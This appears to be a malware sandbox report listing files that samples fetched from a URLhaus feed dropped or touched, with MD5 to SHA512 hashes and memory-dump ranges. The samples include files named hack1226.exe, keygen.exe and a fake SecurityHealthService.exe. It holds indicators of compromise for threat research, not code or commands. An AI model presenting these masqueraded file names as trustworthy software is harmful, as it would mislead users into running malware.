memory/4728-195-0x0000000004E50000-0x0000000004E5A000-memory.dmp
memory/2964-215-0x0000000000400000-0x000000000066D000-memory.dmp
C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
| MD5 | de45ebaf10bc27d47eb80a485d7b59f2 |
| SHA1 | ba534af149081e0d1b8f153287cd461dd3671ffd |
| SHA256 | a746597e9b0877a8a6d4d919279045bfea2801d74348b034f222466c2200ea21 |
| SHA512 | 9228255ae7df9c3a332cce8451cf9298298f4f3aab8a25fe334258d76f11cd2bdb069452381cfa68ec46b16a7371dd1e9ad6dfd69c293f068422eae953f2f22a |
C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe
| MD5 | d259a1c0c84bbeefb84d11146bd0ebe5 |
| SHA1 | feaceced744a743145af4709c0fccf08ed0130a0 |
| SHA256 | 8de12184a006d3340241492baca0ba1034182b08d3c6a0f09c0af99d539bd48b |
| SHA512 | 84944d132fb47be7d22e55456bc1c4bbb93ce281b775e57641a012602f77219c6a9c75ed67ca1fbec1ee15550dee58b9a8adeacbe136e58d2ed1f4c6b755fd54 |
memory/3280-236-0x0000000000400000-0x000000000041F000-memory.dmp
C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe
| MD5 | 935cd858e1bfa763e24214f64e400a15 |
| SHA1 | f8d129e7288a9c41a0bd44521b253a6f708d9684 |
| SHA256 | c3c6e841f611923135474590c9c7c770a49f0c87c4e1850e13bb2b48ffdb5104 |
| SHA512 | 4b8bd0aa1635f3f4e1d6b32119ef34bb4693ea083b08aae21b3c98c84057b9475f2d858f881641ec48618182822ca071d09110696dec229e82d586814f89b122 |
memory/1224-246-0x0000000000400000-0x0000000000425000-memory.dmp
C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe
| MD5 | 11bc606269a161555431bacf37f7c1e4 |
| SHA1 | 63c52b0ac68ab7464e2cd777442a5807db9b5383 |
| SHA256 | 1831806fc27d496f0f9dcfd8402724189deaeb5f8bcf0118f3d6484d0bdee9ed |
| SHA512 | 0be867fce920d493d2a37f996627bceea87621ba4071ae4383dd4a24748eedf7dc5ca6db089217b82ec38870248c6840f785683bf359d1014c7109e7d46dd90f |
memory/4728-264-0x0000000005060000-0x0000000005072000-memory.dmp
C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe
| MD5 | 73c088a54fd675be63ae50e1415bce9b |
| SHA1 | 968ca108ce1d803f69cc3e1833d6d56615342169 |
| SHA256 | e9cb28657a6dcd7e0f17f6e4f7d128351c389784bb027fdaba7f669794edc846 |
| SHA512 | 109d80075631fae4a952b972073677aafdb8b6c70d7e6ac1add6d6bfb5bee9a5227c3691d229a70ac67b993f37464b89efaf87b62f6646b135311e04419f9c09 |
memory/112-283-0x0000000000AF0000-0x0000000000B66000-memory.dmp
memory/3280-287-0x0000000000400000-0x000000000041F000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
memory/112-303-0x0000000003220000-0x0000000003262000-memory.dmp
C:\Users\Admin\Downloads\UrlHausFiles\Photo.scr
| MD5 | aba2d86ed17f587eb6d57e6c75f64f05 |
| SHA1 | aeccba64f4dd19033ac2226b4445faac05c88b76 |
| SHA256 | 807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d |
| SHA512 | c3f276820d6b2872c98fa36c7b62f236f9f2650b344a243a30dcda9ca08726f6ce27c5c380b4256a1a7d8d4309e1f2f270f10bad18099a8c9e1835925ea51806 |
C:\Users\Admin\AppData\Local\Temp\scoped_dir2608_1360859761\7d97f0d3-6926-4d65-8f84-c0a339cd63e7.tmp
| MD5 | 3f6f93c3dccd4a91c4eb25c7f6feb1c1 |
| SHA1 | 9b73f46adfa1f4464929b408407e73d4535c6827 |
| SHA256 | 19f05352cb4c6e231c1c000b6c8b7e9edcc1e8082caf46fff16b239d32aa7c9e |
| SHA512 | d488fa67e3a29d0147e9eaf2eabc74d9a255f8470cf79a4aea60e3b3b5e48a3fcbc4fc3e9ce58dff8d7d0caa8ae749295f221e1fe1ba5d20deb2d97544a12ba4 |
C:\Users\Admin\AppData\Local\Temp\scoped_dir2608_1360859761\CRX_INSTALL\_locales\en_CA\messages.json
| MD5 | 558659936250e03cc14b60ebf648aa09 |
| SHA1 | 32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825 |
| SHA256 | 2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b |
| SHA512 | 1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.84.1_0\dasherSettingSchema.json
| MD5 | 4ec1df2da46182103d2ffc3b92d20ca5 |
| SHA1 | fb9d1ba3710cf31a87165317c6edc110e98994ce |
| SHA256 | 6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6 |
| SHA512 | 939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.84.1_0\_locales\en_CA\messages.json
| MD5 | 07ffbe5f24ca348723ff8c6c488abfb8 |
| SHA1 | 6dc2851e39b2ee38f88cf5c35a90171dbea5b690 |
| SHA256 | 6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c |
| SHA512 | 7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
| MD5 | cfa0650e39b1538915cf2768ee79985d |
| SHA1 | a2e062898a45473e76b3d5f2f2ea5f80098db2d9 |
| SHA256 | d180afcf17c73377523056102f5e8e114cfb99eb084250bf4b4c77993d90ddac |
| SHA512 | d83339817821cd0ce8e065c9e87777ba895cc88c5a7f7c452846381e59f82b02a9d040f515a2ae94969e73a1088c4b9ef09aa83e7fbc029420561f67cd020631 |
C:\Users\Admin\Downloads\UrlHausFiles\Photo.scr
| MD5 | 513b447629c40c3a014d2c876db4d46d |
| SHA1 | 5f4e6977710602bea5d0023fa4f39e3648d2f015 |
| SHA256 | 7e4178577a90b4e1476167bcd46207e4f682bb08412e4688563bbae60476a167 |
| SHA512 | d659f01ab481f670b9a1c785d88544186c898ac7b8558b49d22444a9182c702d6462b2514d1e8dec0c02cd0744724780f8eb3908f0e031ccb302955bb43c9a7f |
memory/1224-733-0x0000000000400000-0x0000000000425000-memory.dmp
memory/1224-732-0x0000000000400000-0x0000000000425000-memory.dmp
C:\Users\Admin\Downloads\UrlHausFiles\unik.exe
| MD5 | 8d4744784b89bf2c1affb083790fdc88 |
| SHA1 | d3f5d8d2622b0d93f7ce5b0da2b5f4ed439c6ec5 |
| SHA256 | d6a689c92843fce8cbd5391511ed74f7e9b6eb9df799626174a8b4c7160bea75 |
| SHA512 | b3126463c8d5bb69a161778e871928dc9047b69bfcb56b1af91342034a15e03a1e5a0ccea4ba7334a66a361842e8241046e00500626613a00cb5bec891436641 |
memory/3636-752-0x0000000000400000-0x00000000008BA000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 36988ca14952e1848e81a959880ea217 |
| SHA1 | a0482ef725657760502c2d1a5abe0bb37aebaadb |
| SHA256 | d7e96088b37cec1bde202ae8ec2d2f3c3aafc368b6ebd91b3e2985846facf2e6 |
| SHA512 | d04b2f5afec92eb3d9f9cdc148a3eddd1b615e0dfb270566a7969576f50881d1f8572bccb8b9fd7993724bdfe36fc7633a33381d43e0b96c4e9bbd53fc010173 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\3d931e76-2d97-46dc-b793-0e3df19e175f.tmp
| MD5 | 5058f1af8388633f609cadb75a75dc9d |
| SHA1 | 3a52ce780950d4d969792a2559cd519d7ee8c727 |
| SHA256 | cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 |
| SHA512 | 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | fab8d8d865e33fe195732aa7dcb91c30 |
| SHA1 | 2637e832f38acc70af3e511f5eba80fbd7461f2c |
| SHA256 | 1b034ffe38e534e2b7a21be7c1f207ff84a1d5f3893207d0b4bb1a509b4185ea |
| SHA512 | 39a3d43ef7e28fea2cb247a5d09576a4904a43680db8c32139f22a03d80f6ede98708a2452f3f82232b868501340f79c0b3f810f597bcaf5267c3ccfb1704b43 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | e21f9d7927b3e3339999038450e5ba6c |
| SHA1 | b99e9d7c2fd55e47b5a99915924c05c350b8eed2 |
| SHA256 | 31dac7297a481790647724631e363abaf464c38f5758613616fcacaf0b7ab3d8 |
| SHA512 | 45162dbead1e25b748af80913861e9017c576d13952da0527e40376ffaa6c07cbb46b3a64a5fc4877d0eb833c92dfe20cdd0acda3bef2adc483ce78629fffc9c |
memory/3636-788-0x0000000010000000-0x000000001001C000-memory.dmp
C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe
| MD5 | 2dcfbac83be168372e01d4bd4ec6010c |
| SHA1 | 5f0cf3f5be05b478dec3a55b7e1757ca7c1a7fd3 |
| SHA256 | 68fbb7d4c5af27b3941f4db758e2007decdd35849ab025a9e06d2ad4718b8b63 |
| SHA512 | a5acad6b7f97472367f59e85e8d61e7bbf25d6a1fc9054910780593440a2345d9ec8bb22a7f41b5b8f85eacbab9f8971dbe31c11c4c887647f86140f98e5a143 |
memory/4048-797-0x0000000000400000-0x000000000047D000-memory.dmp
memory/4728-801-0x0000000006440000-0x0000000006494000-memory.dmp
C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe
| MD5 | 169a647d79cf1b25db151feb8d470fc7 |
| SHA1 | 86ee9ba772982c039b070862d6583bcfed764b2c |
| SHA256 | e61431610df015f48ebc4f4bc0492c4012b34d63b2f474badf6085c9dbc7f708 |
| SHA512 | efb5fd3e37da05611be570fb87929af73e7f16639b5eb23140381434dc974afc6a69f338c75ede069b387015e302c5106bf3a8f2727bb0406e7ca1de3d48a925 |
memory/4312-812-0x000001E7EDE60000-0x000001E7EE07C000-memory.dmp
memory/4312-815-0x000001E7F07B0000-0x000001E7F094E000-memory.dmp
memory/4312-817-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-823-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-835-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-861-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-857-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-867-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-865-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-863-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-855-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-853-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-851-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-859-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-849-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-847-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-845-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-843-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-841-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-839-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-837-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-833-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-831-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-829-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-827-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-821-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-819-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-816-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-825-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe
| MD5 | b41541e6a56a4b091855938cefc8b0f0 |
| SHA1 | 8006b2728d05eab4c5d6dc0bb3b115ddc1e2eaa7 |
| SHA256 | d4c48762f128436fed18b9c714e55bf7360802127efb233ad31ec4b0f7f649b1 |
| SHA512 | a3c2b5dddbb5b8ded63e04672610287458b4bed6ea054e45804e612a2896d92412ef632c621a49b445412d8998a5edc914b055502e22fcfe0e178e5098b64828 |
memory/4312-2015-0x000001E7F0A50000-0x000001E7F0B5E000-memory.dmp
memory/4312-2016-0x000001E7F0650000-0x000001E7F069C000-memory.dmp
memory/3636-2018-0x0000000000400000-0x00000000008BA000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\84KCLP1T\download[2].htm
| MD5 | cfcd208495d565ef66e7dff9f98764da |
| SHA1 | b6589fc6ab0dc82cf12099d1c2d40ab994e8410c |
| SHA256 | 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9 |
| SHA512 | 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99 |
memory/3116-2027-0x0000000000320000-0x0000000000396000-memory.dmp
memory/3116-2046-0x00000000076B0000-0x00000000076CA000-memory.dmp
memory/3116-2047-0x0000000006FB0000-0x0000000006FB6000-memory.dmp
memory/4048-2049-0x0000000000400000-0x000000000047D000-memory.dmp
C:\Users\Admin\Downloads\UrlHausFiles\zke-ascv.exe
| MD5 | 6b84d200c817fd3956d0521f4ba0d1c5 |
| SHA1 | 14c69b9b4b199c1f21b31ddbde3ce3141a25131d |
| SHA256 | f0e0068b11df929aec7260f53bb5ddf84835a6524fe187724340f23ed09bb639 |
| SHA512 | c8f96c208624b348262755aeeb8c89c84aac09c14a5960f77f292110125cebc72685323508195e7c61d8f2c57feb9ed74af5c9a60847a229327c29db6cf8a049 |
memory/4800-2056-0x0000000000400000-0x000000000041C000-memory.dmp
C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe
| MD5 | 759f5a6e3daa4972d43bd4a5edbdeb11 |
| SHA1 | 36f2ac66b894e4a695f983f3214aace56ffbe2ba |
| SHA256 | 2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d |
| SHA512 | f97c793e1489e09dc6867bc9fb8a8e6073e08e1019b7a6fd57efdb31099047fcef9bc7bc3a8194742d7998f075c50e5d71670711bf077da1ac801aab7d19b385 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kmnzbik1.o2z.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3164-2102-0x0000018378140000-0x0000018378162000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | bc20bff934a86acf6898a4986bcceaf9 |
| SHA1 | bf54082121ca18c9739de73a50b84f07ab6f0513 |
| SHA256 | 093cb3ac4446458114d8c8e4e47fe26cc31e32e6ff26b0f1ef0a5c626689aa71 |
| SHA512 | 519660378b15bc02fdc274a8ab811a45b9e52b70254485c20cc9e275639aee90ac4c3ec057a668237bd10400f988a3d1db621508dbcd60bd93dd731ebde8e740 |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3227495264-2217614367-4027411560-1000\0f5007522459c86e95ffcc62f32308f1_423fd5c7-8559-4b8c-bf1f-c9d05c9f0fd3
| MD5 | c07225d4e7d01d31042965f048728a0a |
| SHA1 | 69d70b340fd9f44c89adb9a2278df84faa9906b7 |
| SHA256 | 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a |
| SHA512 | 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3227495264-2217614367-4027411560-1000\0f5007522459c86e95ffcc62f32308f1_423fd5c7-8559-4b8c-bf1f-c9d05c9f0fd3
| MD5 | d898504a722bff1524134c6ab6a5eaa5 |
| SHA1 | e0fdc90c2ca2a0219c99d2758e68c18875a3e11e |
| SHA256 | 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9 |
| SHA512 | 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61 |
memory/4312-2199-0x000001E7F0BA0000-0x000001E7F0BF4000-memory.dmp
memory/4272-2210-0x0000000000400000-0x00000000004CE000-memory.dmp
memory/4272-2215-0x0000024B00360000-0x0000024B00368000-memory.dmp
memory/4272-2244-0x0000024B1A5F0000-0x0000024B1A6FA000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\Downloads\UrlHausFiles\ew.exe
| MD5 | d76e1525c8998795867a17ed33573552 |
| SHA1 | daf5b2ffebc86b85e54201100be10fa19f19bf04 |
| SHA256 | f4dd44bc19c19056794d29151a5b1bb76afd502388622e24c863a8494af147dd |
| SHA512 | c02e1dcea4dc939bee0ca878792c54ff9be25cf68c0631cba1f15416ab1dabcd16c9bb7ad21af69f940d122b82880b1db79df2264a103463e193f8ae157241dd |
memory/4800-4899-0x0000000000400000-0x000000000041C000-memory.dmp
C:\Users\Admin\Downloads\UrlHausFiles\client.exe
| MD5 | d57c5086ea166bc56e091761a43781ff |
| SHA1 | 16b7a96e3c43e82ca962bd94ae1898f796c9cd00 |
| SHA256 | dc08aa33da827c3199f3f0345606b97b83bc508239c4c24f02a78d6e996bca09 |
| SHA512 | 893a1fea55837f2cb7cca1a22ab18795c3fcf91edcdf506c269415b06257d17c8fc426b50a8aa2e4dd34de73cc8fe41711b3276b16499a56714aecd2b98cccda |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | c1300146567d69e9343e4bffb9b5d018 |
| SHA1 | 966f6a7deb9a16ea0f0ab102ee94176b8c864c64 |
| SHA256 | 869cdb4a4fb16f52178d549b4eaf6b8bdaa32aacb06d638747a420acb3a8997c |
| SHA512 | b0b8bc98dae0a186775365c108bbbe3b770bb64905c6057cba420e2a4e9aa1f6351f187d465cb2162514552f2f391a90a6aa660de3169c0778891f04b09c24f4 |
memory/8012-6110-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 57c05aca699f10d19fd24db73e576240 |
| SHA1 | cac9fbbf45fe21d31352154300d2c9b7411ce943 |
| SHA256 | 35ee3fcf8ab2bc20e87670936b80ce5d9d89c4491d5ec72de31a48784e932bcb |
| SHA512 | 9e4258c72c6d0702c64a3e0b6780b7f1fb19c4d5e928f0287ec5b0e6adfe2040542bca252dc5a4cebd675ddb5d1d1d53701baecb838c592360b9fc9a1e832245 |
C:\Users\Admin\Downloads\UrlHausFiles\file.exe
| MD5 | f7f61ffb8e1f1e272bdf4d326086e760 |
| SHA1 | 452117f31370a5585d8615fc42bc31fdbe32a348 |
| SHA256 | e98ae7f96f7cee07ef93b3c98ccae81c66b29e4ede046112e200bf7c152fa9af |
| SHA512 | 158fe3a916f761d766acb75da048b6e224a18d8aadde24af238e6c94be117ff2639463cb4b78c8642a3980d1b9e130741023a848853bca135e8f1fcba481305f |
memory/4272-6328-0x0000024B01BC0000-0x0000024B01C16000-memory.dmp
C:\Program Files (x86)\seetrol\client\SeetrolClient.exe
| MD5 | c3192af2dff9319b35ec48b6fe23b0ff |
| SHA1 | 3713858569b97f4044caf9f2e0f8ad5b6b2ef713 |
| SHA256 | aec05f916b60a80379a0ecde59749ec89beaa0d331e67846f172dbdce858f278 |
| SHA512 | dea78632c6e7d4b749982765857de3daab0ecd2a92ae38a7497d5bdfa6d56d7b8a2378a3043455b645526f67fcdebeaff09d5799c410b383e50e44fa46acd0cd |
memory/5796-6355-0x0000000000400000-0x0000000000727000-memory.dmp
memory/8012-6357-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe
| MD5 | 3bd08acd4079d75290eb1fb0c34ff700 |
| SHA1 | 84d4d570c228271f14e42bbb96702330cc8c8c2d |
| SHA256 | 4d3d060d8ec7089acfb4ba233d6f2a00a910503be648709a97714c84a80cccd8 |
| SHA512 | 42309b28e5bf15ee9a4708ffcdb18ef2925d4b51151dab75168d3578db538b658c706cd77bfceae9a927516d3fb4b4bd3356e0ee066af5aaeadaa00ecff9a760 |
memory/6420-6387-0x0000000000400000-0x000000000042B000-memory.dmp
memory/2964-6396-0x0000000000400000-0x000000000066D000-memory.dmp
C:\Users\Admin\Downloads\UrlHausFiles\inst77player_1.0.0.1.exe
| MD5 | 5c71794e0bfd811534ff4117687d26e2 |
| SHA1 | f4e616edbd08c817af5f7db69e376b4788f835a5 |
| SHA256 | f5740aded1f401665ab8bde43afee5dc0b01aa8aacabe9b8bb61b1ef52134a39 |
| SHA512 | a7a489d39d2cabdd15fd23354140c559a93969a7474c57553c78dbb9ebbf045541f42c600d7d4bea54a2a1f1c6537b8027a1f385fde6040f339959862ac2ea54 |
C:\Users\Admin\AppData\Local\Temp\nssB09F.tmp\ioSpecial.ini
| MD5 | 82e897f156e4c82d548dd708f837f0a2 |
| SHA1 | 58c05ee7c4a4b2a855858c99744e50220a65c1b6 |
| SHA256 | 719161d6e20fa3dd95dd290b6eca348c15a686cc7d17c368e7701f5bd2f7e45c |
| SHA512 | 05e1d2a0faf3f57371046e6a9a2a10a6aa92cf49ff62c7c5f4e160a458fddc4cbb7b98c139fbcea62688af96e7910271e4575c576bccff3630c3d0632f881a78 |
C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe
| MD5 | 6f154cc5f643cc4228adf17d1ff32d42 |
| SHA1 | 10efef62da024189beb4cd451d3429439729675b |
| SHA256 | bf901de5b54a593b3d90a2bcfdf0a963ba52381f542bf33299bdfcc3b5b2afff |
| SHA512 | 050fc8a9a852d87f22296be8fe4067d6fabefc2dec408da3684a0deb31983617e8ba42494d3dbe75207d0810dec7ae1238b17b23ed71668cc099a31e1f6539d1 |
memory/7820-6496-0x00000000007C0000-0x0000000000AE4000-memory.dmp
memory/3636-6509-0x0000000000400000-0x00000000008BA000-memory.dmp
memory/7980-6511-0x000000001C9F0000-0x000000001CA40000-memory.dmp
memory/7980-6532-0x000000001CB00000-0x000000001CBB2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | d13f5d41f67a0df14853e98df208b3b7 |
| SHA1 | ee690d3a174496644b6adc2d59212df297548f21 |
| SHA256 | bfc826802caaed41b806a6509b42e7cc055f46f99e0dc78e81f64e6bd0615f8e |
| SHA512 | f90441bf3466d8bfc2fbb406670a85455c08b0f5cab306c66cef64e9c8c81c19f585a2dade720e3946202c6729e20ba03cf38bad8167b2ec3e5dc6c742485395 |
memory/5796-6563-0x0000000000400000-0x0000000000727000-memory.dmp
memory/6420-6568-0x0000000000400000-0x000000000042B000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | d2afd93fcb553f22eb199a5cbc5fb70f |
| SHA1 | cf79b779b230eccdce31ce22f8745a2c00d4bbac |
| SHA256 | e4d68c1a2cc7aaadfb03dcd713c8041bbef28dd225f17be8ab7ff64832fab346 |
| SHA512 | bfb835571b4d4428711c5777c01918fb0f1f6791a60dfdc41b69439f706092910552405344533a59bf2795f672c3241bc83b78ce8a68d540645d25a472817304 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | 7c13e1ef9a7825a781ca4137780f732e |
| SHA1 | 480e51fdb6060b7573bffd8064db1c7abaf3bd07 |
| SHA256 | f532fa4b25f7a3c90c2c7524324394b1562f5bd3ad2eabcbf632b6c5046108ac |
| SHA512 | 557e833baf1f281b77fdb858112b0ea097674fd0a419de298ee1d398cc669d77f3cd7fe58cf491185e0092f257c2f9b39598df976fb4a65d0a5398c749a9d688 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe58d83a.TMP
| MD5 | 6946c194f288b2bf3305e516b8c48f83 |
| SHA1 | da72e14366952d95a44146eb32cb19bfecf2c8b7 |
| SHA256 | b85dae14f3385d5c0417569b12a70a634b31451bcf73f32017591a230dad5f9c |
| SHA512 | 1ebbc2a0172211d63f42db22c39e3e1ebe90454de7bf5b125f9f63921d2bcc551634910b3f4cebb19491785a0d5b0d59f0847a7951d3a632c5836b332273419c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 99fd9a26b574900b8812fdad22c15e33 |
| SHA1 | b67a0d80f8a255e2a0fc404933a059b7400ab7b1 |
| SHA256 | 10cb8296d9b3d4ea62eed7ecf55a70364fe101f266f146a96b2bf6170ef73416 |
| SHA512 | b4d6867f7d2da2b6e6cd2176079dff757e1f993cf7eb2b5aeb257932c3cc17a0cbfd1655b6169773088bbfbc503bb9c097daf6ea14c329ce083426ddf3c286fe |